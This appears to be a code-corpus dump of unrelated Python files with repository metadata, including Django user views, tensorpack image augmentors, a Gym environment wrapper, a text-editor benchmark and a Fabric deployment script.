           'f62936c2eb31a053f422b5fdea9ea4748ce873a399ab521ccbf3ec29fefce9d1')
print(send_msg(url, reminders, msg))
| [
"yy.tedu.cn"
] | yy.tedu.cn |
616469de1aec009732d1ae11d1d7737bda848a16 | 75a2d464d10c144a6226cb5941c86423a1f769cf | /users/views.py | 21cc73b926aab722ac47e1f4965cdb0561c47aff | [] | no_license | Swiftkind/invoice | f5543cbe81b6d42e9938470265d7affb56ab83dd | 17615ea9bfb1edebe41d60dbf2e977f0018d5339 | refs/heads/master | 2021-09-07T18:16:01.647083 | 2018-02-08T08:13:18 | 2018-02-08T08:13:18 | 115,474,697 | 0 | 3 | null | 2018-02-27T06:58:42 | 2017-12-27T02:55:40 | Python | UTF-8 | Python | false | false | 5,494 | py | from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib import messages
from django.http import Http404
from django.shortcuts import get_object_or_404, render, redirect
from django.views.generic import TemplateView
from django.views import View
from users.forms import CompanyForm, UserChangePasswordForm, UserUpdateForm, SigninForm, SignupForm
from users.mixins import UserIsOwnerMixin
from users.models import Company, User
class SigninView(TemplateView):
"""Signin user
"""
template_name = 'users/signin.html'
def get(self, *args, **kwargs):
"""Get signin form
"""
if self.request.user.is_authenticated:
return redirect('index')
form = SigninForm()
return render(self.request, self.template_name,{'form':form})
def post(self, *args, **kwargs):
"""Signin user
"""
form = SigninForm(data=self.request.POST)
if form.is_valid():
login(self.request, form.user_cache)
return redirect('index')
else:
context={ 'form':form,}
return render(self.request, self.template_name, context)
class SignupView(TemplateView):
"""Signup user
"""
template_name = 'users/signup.html'
def get(self, *args, **kwargs):
"""Display signup form
"""
context = { 'company_form' : CompanyForm(),
'signup_form' : SignupForm(),
}
return render(self.request, self.template_name, context)
def post(self, *args, **kwargs):
company_form = CompanyForm(self.request.POST, self.request.FILES)
signup_form = SignupForm(self.request.POST, self.request.FILES)
if signup_form.is_valid() and company_form.is_valid():
company = company_form.save(commit=False)
user = signup_form.save(commit=False)
company.save()
user.company = company
user.save()
            messages.success(self.request, 'Account successfully created. Activate your account from the admin.')
return redirect('index')
else:
            # re-use the bound forms so their validation errors are preserved
            context = { 'company_form' : company_form,
                        'signup_form' : signup_form,
                      }
return render(self.request, self.template_name, context)
class SignoutView(LoginRequiredMixin, View):
"""Signout a user
"""
def get(self, *args, **kwargs):
"""Logout user and redirect to signin
"""
logout(self.request)
return redirect('signin')
class UserProfileView(UserIsOwnerMixin, TemplateView):
"""User profile
"""
template_name = 'users/profile.html'
def get(self, *args, **kwargs):
"""View user details
"""
context = {'user': get_object_or_404(User, pk=kwargs['user_id'])}
return render(self.request, self.template_name, context=context)
class UserUpdateView(UserIsOwnerMixin, TemplateView):
"""Update User
"""
template_name = 'users/update_user.html'
def get(self, *args, **kwargs):
"""Display form
"""
user = get_object_or_404(User, pk=kwargs['user_id'])
if self.request.user == user:
context = { 'company_form':CompanyForm(instance=user.company),
'user_form': UserUpdateForm(instance=user),
}
return render(self.request, self.template_name, context=context)
else:
raise Http404("Does not exist")
def post(self, request, *args, **kwargs):
"""Update a user
"""
user = get_object_or_404(User, pk=kwargs['user_id'])
user_form = UserUpdateForm(self.request.POST, self.request.FILES,instance=user)
company_form = CompanyForm(self.request.POST, self.request.FILES,instance=user.company)
if user_form.is_valid() and company_form.is_valid():
company_form.save()
user_form.save()
messages.success(self.request, 'User is successfully updated')
return redirect('index' )
else:
context = { 'company_form': company_form,
'user_form' : user_form,
}
return render(self.request, self.template_name, context=context)
class UserSettingView(UserIsOwnerMixin, TemplateView):
""" User settings
"""
template_name = 'users/setting.html'
def get(self, *args, **kwargs):
""" View setting
"""
return render(self.request, self.template_name)
class UserChangePassword(UserIsOwnerMixin, TemplateView):
""" User change password
"""
template_name = 'users/change_password.html'
def get(self, *args, **kwargs):
""" Change password form
"""
context = {}
context['form'] = UserChangePasswordForm()
return render(self.request, self.template_name, context)
def post(self, *args, **kwargs):
""" Check old and new password match
"""
form = UserChangePasswordForm(self.request.POST, user=self.request.user)
if form.is_valid():
form.save()
return redirect('index')
else:
context = {}
            context['form'] = form  # re-use the bound form to keep its errors
return render(self.request, self.template_name, context)
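# Sketch (assumption, not part of this file): these class-based views would
# typically be wired up in a urls.py along these lines; the paths and names
# below are illustrative only.
#
#   from django.urls import path
#   from users import views
#
#   urlpatterns = [
#       path('signin/', views.SigninView.as_view(), name='signin'),
#       path('signup/', views.SignupView.as_view(), name='signup'),
#       path('signout/', views.SignoutView.as_view(), name='signout'),
#       path('users/<int:user_id>/', views.UserProfileView.as_view(), name='profile'),
#       path('users/<int:user_id>/update/', views.UserUpdateView.as_view(), name='update_user'),
#   ]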
| [
"[email protected]"
] | |
df7db5f6cf855b9e25fa5feb01494b88573aacf4 | c5458f2d53d02cb2967434122183ed064e1929f9 | /sdks/python/test/test_contains_asset_predicate.py | 4fe42254ff5b1cf16affd36b2f5c261675e7f2ab | [] | no_license | ross-weir/ergo-node-api-sdks | fd7a32f79784dbd336ef6ddb9702b9dd9a964e75 | 9935ef703b14760854b24045c1307602b282c4fb | refs/heads/main | 2023-08-24T05:12:30.761145 | 2021-11-08T10:28:10 | 2021-11-08T10:28:10 | 425,785,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,131 | py | """
Ergo Node API
API docs for Ergo Node. Models are shared between all Ergo products # noqa: E501
The version of the OpenAPI document: 4.0.15
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import openapi_client
from openapi_client.model.contains_asset_predicate_all_of import ContainsAssetPredicateAllOf
from openapi_client.model.scanning_predicate import ScanningPredicate
globals()['ContainsAssetPredicateAllOf'] = ContainsAssetPredicateAllOf
globals()['ScanningPredicate'] = ScanningPredicate
from openapi_client.model.contains_asset_predicate import ContainsAssetPredicate
class TestContainsAssetPredicate(unittest.TestCase):
"""ContainsAssetPredicate unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testContainsAssetPredicate(self):
"""Test ContainsAssetPredicate"""
# FIXME: construct object with mandatory attributes with example values
# model = ContainsAssetPredicate() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
0c77dbbd8fb08d26e300e02084f0f0fbd2f1fcfe | 80c3546d525a05a31d30cc318a44e053efaeb1f1 | /tensorpack/dataflow/imgaug/misc.py | 7fc983d4c9de61f53efc05459cca5493fcaca5a5 | [
"Apache-2.0"
] | permissive | yaroslavvb/tensorpack | 0f326bef95699f84376465609b631981dc5b68bf | 271ffad1816132c57baebe8a1aa95479e79f4ef9 | refs/heads/master | 2021-05-03T11:02:22.170689 | 2018-02-06T08:18:48 | 2018-02-06T08:18:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,419 | py | # -*- coding: UTF-8 -*-
# File: misc.py
import numpy as np
import cv2
from .base import ImageAugmentor
from ...utils import logger
from ...utils.argtools import shape2d
from .transform import ResizeTransform, TransformAugmentorBase
__all__ = ['Flip', 'Resize', 'RandomResize', 'ResizeShortestEdge', 'Transpose']
class Flip(ImageAugmentor):
"""
Random flip the image either horizontally or vertically.
"""
def __init__(self, horiz=False, vert=False, prob=0.5):
"""
Args:
horiz (bool): use horizontal flip.
vert (bool): use vertical flip.
prob (float): probability of flip.
"""
super(Flip, self).__init__()
if horiz and vert:
raise ValueError("Cannot do both horiz and vert. Please use two Flip instead.")
elif horiz:
self.code = 1
elif vert:
self.code = 0
else:
raise ValueError("At least one of horiz or vert has to be True!")
self._init(locals())
def _get_augment_params(self, img):
h, w = img.shape[:2]
do = self._rand_range() < self.prob
return (do, h, w)
def _augment(self, img, param):
do, _, _ = param
if do:
ret = cv2.flip(img, self.code)
if img.ndim == 3 and ret.ndim == 2:
ret = ret[:, :, np.newaxis]
else:
ret = img
return ret
def _augment_coords(self, coords, param):
do, h, w = param
if do:
if self.code == 0:
coords[:, 1] = h - coords[:, 1]
elif self.code == 1:
coords[:, 0] = w - coords[:, 0]
return coords
class Resize(TransformAugmentorBase):
""" Resize image to a target size"""
def __init__(self, shape, interp=cv2.INTER_LINEAR):
"""
Args:
shape: (h, w) tuple or a int
interp: cv2 interpolation method
"""
shape = tuple(shape2d(shape))
self._init(locals())
def _get_augment_params(self, img):
return ResizeTransform(
img.shape[0], img.shape[1],
self.shape[0], self.shape[1], self.interp)
class ResizeShortestEdge(TransformAugmentorBase):
"""
Resize the shortest edge to a certain number while
keeping the aspect ratio.
"""
def __init__(self, size, interp=cv2.INTER_LINEAR):
"""
Args:
size (int): the size to resize the shortest edge to.
"""
size = int(size)
self._init(locals())
def _get_augment_params(self, img):
h, w = img.shape[:2]
scale = self.size * 1.0 / min(h, w)
if h < w:
newh, neww = self.size, int(scale * w + 0.5)
else:
newh, neww = int(scale * h + 0.5), self.size
return ResizeTransform(
h, w, newh, neww, self.interp)
class RandomResize(TransformAugmentorBase):
""" Randomly rescale width and height of the image."""
def __init__(self, xrange, yrange, minimum=(0, 0), aspect_ratio_thres=0.15,
interp=cv2.INTER_LINEAR):
"""
Args:
xrange (tuple): a (min, max) tuple. If is floating point, the
tuple defines the range of scaling ratio of new width, e.g. (0.9, 1.2).
If is integer, the tuple defines the range of new width in pixels, e.g. (200, 350).
yrange (tuple): similar to xrange, but for height.
minimum (tuple): (xmin, ymin) in pixels. To avoid scaling down too much.
aspect_ratio_thres (float): discard samples which change aspect ratio
larger than this threshold. Set to 0 to keep aspect ratio.
interp: cv2 interpolation method
"""
super(RandomResize, self).__init__()
assert aspect_ratio_thres >= 0
self._init(locals())
def is_float(tp):
return isinstance(tp[0], float) or isinstance(tp[1], float)
assert is_float(xrange) == is_float(yrange), "xrange and yrange has different type!"
self._is_scale = is_float(xrange)
if self._is_scale and aspect_ratio_thres == 0:
assert xrange == yrange
def _get_augment_params(self, img):
cnt = 0
h, w = img.shape[:2]
def get_dest_size():
if self._is_scale:
sx = self._rand_range(*self.xrange)
if self.aspect_ratio_thres == 0:
sy = sx
else:
sy = self._rand_range(*self.yrange)
destX = max(sx * w, self.minimum[0])
destY = max(sy * h, self.minimum[1])
else:
sx = self._rand_range(*self.xrange)
if self.aspect_ratio_thres == 0:
sy = sx * 1.0 / w * h
else:
sy = self._rand_range(*self.yrange)
destX = max(sx, self.minimum[0])
destY = max(sy, self.minimum[1])
return (int(destX + 0.5), int(destY + 0.5))
while True:
destX, destY = get_dest_size()
if self.aspect_ratio_thres > 0: # don't check when thres == 0
oldr = w * 1.0 / h
newr = destX * 1.0 / destY
diff = abs(newr - oldr) / oldr
if diff >= self.aspect_ratio_thres + 1e-5:
cnt += 1
if cnt > 50:
logger.warn("RandomResize failed to augment an image")
return ResizeTransform(h, w, h, w, self.interp)
continue
return ResizeTransform(h, w, destY, destX, self.interp)
class Transpose(ImageAugmentor):
"""
Random transpose the image
"""
def __init__(self, prob=0.5):
"""
Args:
prob (float): probability of transpose.
"""
super(Transpose, self).__init__()
self.prob = prob
self._init()
def _get_augment_params(self, img):
return self._rand_range() < self.prob
def _augment(self, img, do):
ret = img
if do:
ret = cv2.transpose(img)
if img.ndim == 3 and ret.ndim == 2:
ret = ret[:, :, np.newaxis]
return ret
def _augment_coords(self, coords, do):
if do:
coords = coords[:, ::-1]
return coords
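if __name__ == '__main__':
    # Quick smoke test (sketch): apply one augmentor through the public
    # `augment` method inherited from ImageAugmentor. This assumes the base
    # class exposes augment(); treat it as illustrative, not canonical.
    img = np.random.randint(0, 255, size=(32, 64, 3), dtype='uint8')
    aug = Flip(horiz=True, prob=1.0)
    out = aug.augment(img)
    print(out.shape)  # same shape, horizontally flipped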
| [
"[email protected]"
] | |
92572d40e11aaec728a9177ec310fa9eb822e9f5 | b6f4e527154b82f4e3fa48f06ca53fc15bf08283 | /Day02/circle.py | 020bf65e82244b1110af1fb98f7a1eaca88e783e | [] | no_license | Light-City/Python-100-Days | 74118e36c658db6c897f847e7e554311af036b9d | 1fe049a1fe1e64082752d2d32cb75c1a4349cded | refs/heads/master | 2020-03-18T12:44:53.191512 | 2018-05-24T09:49:22 | 2018-05-24T09:49:22 | 134,741,794 | 3 | 1 | null | 2018-05-24T16:29:02 | 2018-05-24T16:29:02 | null | UTF-8 | Python | false | false | 288 | py | """
Compute the circumference and area of a circle from the radius entered.
Version: 0.1
Author: 骆昊
Date: 2018-02-27
"""
import math
radius = float(input('Please enter the radius of the circle: '))
perimeter = 2 * math.pi * radius
area = math.pi * radius * radius
print('Circumference: %.2f' % perimeter)
print('Area: %.2f' % area)
| [
"[email protected]"
] | |
6df0e64800da4c8a788cf625ac191169d6db205a | 5c4852f02b20c5c400c58ff61702a4f35358d78c | /editor_orig.py | 6a4e667273bf50ee0537555a81df701903e3eec4 | [] | no_license | anovacap/daily_coding_problem | 6e11f338ad8afc99a702baa6d75ede0c15f02853 | e64a0e76555addbe3a31fd0ca0bb81e2715766d2 | refs/heads/master | 2023-02-23T11:04:30.041455 | 2021-01-29T18:10:36 | 2021-01-29T18:10:36 | 302,237,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,992 | py | class SimpleEditor:
def __init__(self, document):
self.document = document
self.dictionary = set()
# On windows, the dictionary can often be found at:
# C:/Users/{username}/AppData/Roaming/Microsoft/Spelling/en-US/default.dic
with open("/usr/share/dict/words") as input_dictionary:
for line in input_dictionary:
words = line.strip().split(" ")
for word in words:
self.dictionary.add(word)
self.paste_text = ""
def cut(self, i, j):
self.paste_text = self.document[i:j]
self.document = self.document[:i] + self.document[j:]
def copy(self, i, j):
self.paste_text = self.document[i:j]
def paste(self, i):
self.document = self.document[:i] + self.paste_text + self.document[i:]
def get_text(self):
return self.document
def misspellings(self):
result = 0
for word in self.document.split(" "):
if word not in self.dictionary:
result = result + 1
return result
import timeit
class EditorBenchmarker:
new_editor_case = """
from __main__ import SimpleEditor
s = SimpleEditor("{}")"""
editor_cut_paste = """
for n in range({}):
if n%2 == 0:
s.cut(1, 3)
else:
s.paste(2)"""
editor_copy_paste = """
for n in range({}):
if n%2 == 0:
s.copy(1, 3)
else:
s.paste(2)"""
editor_get_text = """
for n in range({}):
s.get_text()"""
editor_mispellings = """
for n in range({}):
s.misspellings()"""
def __init__(self, cases, N):
self.cases = cases
self.N = N
self.editor_cut_paste = self.editor_cut_paste.format(N)
self.editor_copy_paste = self.editor_copy_paste.format(N)
self.editor_get_text = self.editor_get_text.format(N)
self.editor_mispellings = self.editor_mispellings.format(N)
def benchmark(self):
for case in self.cases:
print("Evaluating case: {}".format(case))
new_editor = self.new_editor_case.format(case)
cut_paste_time = timeit.repeat(stmt=self.editor_cut_paste,setup=new_editor,repeat=3,number=1)
print("{} cut paste operations took {} s".format(self.N, cut_paste_time))
copy_paste_time = timeit.repeat(stmt=self.editor_copy_paste,setup=new_editor,repeat=3,number=1)
print("{} copy paste operations took {} s".format(self.N, copy_paste_time))
get_text_time = timeit.repeat(stmt=self.editor_get_text,setup=new_editor,repeat=3,number=1)
print("{} text retrieval operations took {} s".format(self.N, get_text_time))
mispellings_time = timeit.repeat(stmt=self.editor_mispellings,setup=new_editor,repeat=3,number=1)
print("{} mispelling operations took {} s".format(self.N, mispellings_time))
if __name__ == "__main__":
b = EditorBenchmarker(["hello friends"], 20)
b.benchmark()
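# Note: cut(), copy() and paste() above rebuild the document with string
# slicing, so each call is O(len(document)); misspellings() re-splits the
# whole text each time. The benchmark makes these linear costs visible.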
| [
"[email protected]"
] | |
6b5be029fd1626d37c9b7f3db3aa07efd58e1011 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_123/627.py | 28c02feb9a393af2190da5d1cd6130c71872869c | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,171 | py | __author__ = 'jeff'
from collections import deque
base = "A-small-attempt2"
#base = "A1_test"
f = open(base+'.in','r')
fout = open(base+'.out','w')
t = int(f.readline())
def proc( a, motes):
while( len( motes ) and motes[0] < a ):
a += motes.popleft()
return a
max_lev = 100000
for case in range(1,t+1):
[a,n] = f.readline().split(' ')
a=int(a)
n=int(n)
motes = list(map( int, f.readline()[0:-1].split(' ')))
motes.sort()
print(a,motes)
motes = deque( motes )
moves = 0
adds = removes = 0
lev_count = 0
while( len( motes) ):
a=proc(a,motes)
if( not len( motes ) ):
break
a_copy = a
these_adds = 0
while( a>1 and a_copy <= motes[0] ):
these_adds += 1
a_copy += (a_copy - 1)
if( these_adds > 0 and these_adds < len( motes )):
adds += these_adds
a = a_copy
else:
removes += len( motes )
motes = deque([])
moves = moves + adds + removes
out_s = 'Case #{0}: {1}\n'.format(case,moves)
print( out_s )
fout.write(out_s)
f.close()
fout.close()
| [
"[email protected]"
] | |
459e8127e4b5cb873a598644dc79c3d2708b3db1 | a9c0a8d815b6453aca945849f3b402f75684bfcb | /project/api/services.py | 95d316eb964a262ab8aa954303e31d09a23b1d26 | [] | no_license | harrywang/my-flask-tdd-docker | 4035b666a3366cd059a3a65c68c7c9ad9b637da3 | 362c33e7caa3bf35a62cff71f3c567c5e8de1fd2 | refs/heads/master | 2022-04-13T23:12:04.725775 | 2020-03-21T18:14:00 | 2020-03-21T18:14:00 | 248,801,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | # project/api/services.py
from project import db
from project.api.models import User
def get_all_users():
return User.query.all()
def get_user_by_id(user_id):
return User.query.filter_by(id=user_id).first()
def get_user_by_email(email):
return User.query.filter_by(email=email).first()
def add_user(username, email):
user = User(username=username, email=email)
db.session.add(user)
db.session.commit()
return user
def update_user(user, username, email):
user.username = username
user.email = email
db.session.commit()
return user
def delete_user(user):
db.session.delete(user)
db.session.commit()
return user
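# Example (sketch): typical use from a view or task, assuming an application
# context and a configured database; the values below are illustrative only.
#   user = add_user('alice', '[email protected]')
#   update_user(user, 'alice2', '[email protected]')
#   delete_user(user)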
| [
"[email protected]"
] | |
5a60d55d408bfb0329da3b0de1b835b729d6aea1 | be81eadfe934f3bc12a214e833e375520679b4ca | /src/lib/envs/envGym.py | 254f455d9a821bd035c15718f4e986c5a5aba1d2 | [
"MIT"
] | permissive | sankhaMukherjee/RLalgos | 2bbbabef68ad3bba2d21bc5e5c537db39dbca967 | 80d19a39af29947db2fc73b0443b9c3bb66d6fc0 | refs/heads/master | 2022-12-11T14:44:53.946306 | 2019-06-05T10:10:38 | 2019-06-05T10:10:38 | 164,218,142 | 0 | 0 | MIT | 2022-12-08T04:50:46 | 2019-01-05T13:38:03 | Jupyter Notebook | UTF-8 | Python | false | false | 15,876 | py | import gym, sys
import numpy as np
from collections import deque
import itertools as it
class Env:
    '''A convenience class for generating episodes and memories
    This convenience class generates a context manager that can be
used for generating a Gym environment. This is supposed to be a
drop-in replacement for the Unity environment. This however
differs from the Unity environment in that it needs the name of
the environment as input. The other difference is that there is
no such thing as `trainMode`.
'''
def __init__(self, envName, showEnv=False):
'''Initialize the environment
This sets up the requirements that will later be used for generating
the gym Environment. The gym environment can be used in a mode that
        hides the plotting of the actual environment. This may result in a
significant boost in speed.
Arguments:
envName {str} -- The name of the environment to be generated. This
                should be a valid Gym environment id. In case the name provided
                is not valid, this is going to exit with an error.
Keyword Arguments:
showEnv {bool} -- Set this to ``True`` if you want to view the
environment (default: {False})
'''
try:
self.no_graphics = not showEnv
self.envName = envName
self.states = None
except Exception as e:
raise type(e)(
                'lib.envs.envGym.Env.__init__ - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return
def __enter__(self):
'''generate a context manager
        This will actually generate the context manager and allow you to use
        this within a ``with`` statement. This is the function that actually
        initializes the environment and maintains it until it is needed.
        The idea of multiple agents does not exist in Gym environments as
        it does for Unity agents. However, we shall incorporate this idea
        within the gym environment so that a single action can take place.
Returns:
``this`` -- Returns an instance of the same class
'''
try:
self.env = gym.make(self.envName)
self.state = self.env.reset()
except Exception as e:
raise type(e)(
                'lib.envs.envGym.Env.__enter__ - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return self
def reset(self):
'''reset the environment before starting an episode
Returns:
status -- The current status after the reset
'''
try:
self.state = self.env.reset()
except Exception as e:
raise type(e)(
                'lib.envs.envGym.Env.reset - ERROR - ' + str(e)
            ).with_traceback(sys.exc_info()[2])
        return self.state
def step(self, policy):
'''advance one step by taking an action
This function takes a policy function and generates an action
according to that particular policy. This results in the
advancement of the episode into a one step with the return
of the reward, and the next state along with any done
information.
Arguments:
policy {function} -- This function takes a state vector and
returns an action vector. It is assumed that the policy
                is of the correct type, and is capable of returning the right
                type of action vector for the current environment. It does not
check for the validity of the policy function
Returns:
list -- This returns a list of tuples containing the tuple
``(s_t, a_t, r_{t+1}, s_{t+1}, d)``. One tuple for each
agent. Even for the case of a single agent, this is going
to return a list of states
'''
try:
results = []
states = np.array([self.state])
action = policy(states)[0].cpu().detach().numpy()
#print('A'*30, action, self.env.env.action_space.sample(), self.env.env.action_space)
if type(self.env.env.action_space.sample()) == int:
action = int(action[0])
nextState, reward, done, info = self.env.step(action)
results.append((self.state, action, reward, nextState, done))
self.state = nextState
except Exception as e:
raise type(e)(
                'lib.envs.envGym.Env.step - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return results
def episode(self, policy, maxSteps=None):
'''generate data for an entire episode
        This function generates an entire episode. It plays the environment
        by first resetting it to the beginning, and then playing the game for
        a given number of steps (or until the game is terminated). It generates
        a set of lists of tuples, again one for each agent. Remember that even
        when the number of agents is 1, it will still return a list of states.
Arguments:
policy {function} -- The function that takes the current state and
returns the action vector.
Keyword Arguments:
maxSteps {int or None} -- The maximum number of steps that the agent is
going to play the episode before the episode is terminated. (default:
{None} in which case the episode will continue until it actually
finishes)
Returns:
list -- This returns the list of tuples for the entire episode. Again, this
            is a list of lists, one for each agent.
'''
try:
self.reset()
stepCount = 0
allResults = [[] for _ in range(1)] # One for each agent.
while True:
stepCount += 1
result = self.step(policy)[0]
if not self.no_graphics:
self.env.render()
state, action, reward, next_state, done = result
allResults[0].append(result)
if done:
break
if (maxSteps is not None) and (stepCount >= maxSteps):
break
except Exception as e:
raise type(e)(
                'lib.envs.envGym.Env.episode - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return allResults
def __exit__(self, exc, value, traceback):
'''Exit the context manager
        The exit function that will result in exiting the
        context manager. Typically one is supposed to check
        the error, if any, at this point. This will be handled
        at a higher level.
        Arguments:
            exc, value, traceback -- the standard exception information
        '''
        if not exc:
self.env.close()
return True
class Env1D:
    '''A convenience class for generating episodes and memories
    This convenience class generates a context manager that can be
used for generating a Gym environment. This is supposed to be a
drop-in replacement for the Unity environment. This however
differs from the Unity environment in that it needs the name of
the environment as input. The other difference is that there is
no such thing as `trainMode`.
    This 1D environment is designed to take a 1D state vector and use
this vector in its calculations. If you are using a 1D environment
you are advised to use this.
This environment has the added advantage that it will automatically
stack together ``N`` previous states into a single state. Note that
the first state will be copied ``N`` times, rather than zero padding
as this seems a more natural state for the beginning.
'''
def __init__(self, envName, N=1, showEnv=False):
'''Initialize the environment
This sets up the requirements that will later be used for generating
the gym Environment. The gym environment can be used in a mode that
        hides the plotting of the actual environment. This may result in a
significant boost in speed.
Arguments:
envName {str} -- The name of the environment to be generated. This
                should be a valid Gym environment id. In case the name provided
                is not valid, this is going to exit with an error.
Keyword Arguments:
N {integer} -- Set this to the number of states that you wish to
have that will be concatenated together. (default: 1). You will not
be able to set a value less than 1.
showEnv {bool} -- Set this to ``True`` if you want to view the
environment (default: {False})
'''
try:
self.N = N
self.no_graphics = not showEnv
self.envName = envName
self.states = None
assert type(self.N) == int, f'integer expected. Received {type(self.N)}'
assert self.N > 0, f'self.N = {self.N} (should be greater than 0)'
except Exception as e:
raise type(e)(
                'lib.envs.envGym.Env1D.__init__ - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return
def __enter__(self):
'''generate a context manager
        This will actually generate the context manager and allow you to use
        this within a ``with`` statement. This is the function that actually
        initializes the environment and maintains it until it is needed.
        The idea of multiple agents does not exist in Gym environments as
        it does for Unity agents. However, we shall incorporate this idea
        within the gym environment so that a single action can take place.
Returns:
``this`` -- Returns an instance of the same class
'''
try:
self.env = gym.make(self.envName)
state = self.env.reset()
self.state = deque([state for i in range(self.N+1)], maxlen=self.N+1)
except Exception as e:
raise type(e)(
                'lib.envs.envGym.Env1D.__enter__ - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return self
def reset(self):
'''reset the environment before starting an episode
Returns:
status -- The current status after the reset
'''
try:
state = self.env.reset()
self.state = deque([state for i in range(self.N+1)], maxlen=self.N+1)
except Exception as e:
raise type(e)(
                'lib.envs.envGym.Env1D.reset - ERROR - ' + str(e)
            ).with_traceback(sys.exc_info()[2])
        return self.state
def step(self, policy):
'''advance one step by taking an action
This function takes a policy function and generates an action
according to that particular policy. This results in the
advancement of the episode into a one step with the return
of the reward, and the next state along with any done
information.
Arguments:
policy {function} -- This function takes a state vector and
returns an action vector. It is assumed that the policy
                is of the correct type, and is capable of returning the right
                type of action vector for the current environment. It does not
check for the validity of the policy function
Returns:
list -- This returns a list of tuples containing the tuple
``(s_t, a_t, r_{t+1}, s_{t+1}, d)``. One tuple for each
agent. Even for the case of a single agent, this is going
to return a list of states
'''
try:
results = []
state = np.array(list(it.islice(self.state, 1, 1+self.N)))
state = state.flatten()
states = np.array([state])
action = policy(states)[0].cpu().detach().numpy()
#print('A'*30, action, self.env.env.action_space.sample(), self.env.env.action_space)
if type(self.env.env.action_space.sample()) == int:
action = int(action[0])
nextState, reward, done, info = self.env.step(action)
self.state.append(nextState)
nextState = np.array(list(it.islice(self.state, 1, 1+self.N)))
nextState = nextState.flatten()
results.append((state, action, reward, nextState, done))
except Exception as e:
raise type(e)(
                'lib.envs.envGym.Env1D.step - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return results
def episode(self, policy, maxSteps=None):
'''generate data for an entire episode
        This function generates an entire episode. It plays the environment
        by first resetting it to the beginning, and then playing the game for
        a given number of steps (or until the game is terminated). It generates
        a set of lists of tuples, again one for each agent. Remember that even
        when the number of agents is 1, it will still return a list of states.
Arguments:
policy {function} -- The function that takes the current state and
returns the action vector.
Keyword Arguments:
maxSteps {int or None} -- The maximum number of steps that the agent is
going to play the episode before the episode is terminated. (default:
{None} in which case the episode will continue until it actually
finishes)
Returns:
list -- This returns the list of tuples for the entire episode. Again, this
            is a list of lists, one for each agent.
'''
try:
self.reset()
stepCount = 0
allResults = [[] for _ in range(1)] # One for each agent.
while True:
stepCount += 1
result = self.step(policy)[0]
if not self.no_graphics:
self.env.render()
state, action, reward, next_state, done = result
allResults[0].append(result)
if done:
break
if (maxSteps is not None) and (stepCount >= maxSteps):
break
except Exception as e:
raise type(e)(
                'lib.envs.envGym.Env1D.episode - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return allResults
def __exit__(self, exc, value, traceback):
'''Exit the context manager
        The exit function that will result in exiting the
        context manager. Typically one is supposed to check
        the error, if any, at this point. This will be handled
        at a higher level.
        Arguments:
            exc, value, traceback -- the standard exception information
        '''
        if not exc:
self.env.close()
return True
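if __name__ == '__main__':
    # Minimal smoke test (sketch): drive a few steps of CartPole-v1 with a
    # random policy. Assumes gym and torch are installed; per Env.step above,
    # the policy must return an indexable batch of torch tensors.
    import torch

    def randomPolicy(states):
        return torch.tensor([[np.random.randint(2)]])

    with Env('CartPole-v1') as env:
        results = env.episode(randomPolicy, maxSteps=20)
        print('steps taken:', len(results[0]))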
| [
"[email protected]"
] | |
e23633a5a9b66be7ed21624a319c2ac19699c898 | 81a1c5db1f24a7daf4fe51de499e1aea81d8ea05 | /fabfile.py | 94155b79ffeb1d48061ee035c7bbca818b7c3f36 | [] | no_license | Beomi/azure-django-test | cf0d1fe323a63d9ba2672b8ebea2fc3e170980ce | a811afb62501f2fe245226f9bb94cd51bebc6866 | refs/heads/master | 2021-06-19T15:53:18.932591 | 2017-06-08T12:20:34 | 2017-06-08T12:20:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | true | false | 6,241 | py | from fabric.contrib.files import append, exists, sed, put
from fabric.api import env, local, run, sudo
import random
import os
import json
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Load deploy.json and store its contents in the envs variable.
with open(os.path.join(PROJECT_DIR, "deploy.json")) as f:
envs = json.loads(f.read())
# TODO: Required Fields: REPO_URL, PROJECT_NAME, REMOTE_HOST, REMOTE_PASSWORD, REMOTE_USER, REMOTE_HOST_SSH @ deploy.json
# developer: change this!
REPO_URL = envs['REPO_URL']
PROJECT_NAME = envs['PROJECT_NAME']
REMOTE_HOST_SSH = envs['REMOTE_HOST_SSH']
REMOTE_HOST = envs['REMOTE_HOST']
REMOTE_USER = envs['REMOTE_USER']
REMOTE_PASSWORD = envs['REMOTE_PASSWORD']
STATIC_ROOT_NAME = 'static_deploy'
STATIC_URL_NAME = 'static'
MEDIA_ROOT = 'uploads'
# TODO: Server Engineer: you should add env.user as sudo user and NOT be root
env.user = REMOTE_USER
username = env.user
# Option: env.password
env.hosts = [
REMOTE_HOST_SSH,
]
env.password = REMOTE_PASSWORD
project_folder = '/home/{}/{}'.format(env.user, PROJECT_NAME)
apt_requirements = [
'ufw',
'curl',
'git',
'python3-dev',
'python3-pip',
'build-essential',
'python3-setuptools',
'apache2',
'libapache2-mod-wsgi-py3',
'libmysqlclient-dev',
'libssl-dev',
'libxml2-dev',
'libjpeg8-dev',
'zlib1g-dev',
]
def new_server():
setup()
deploy()
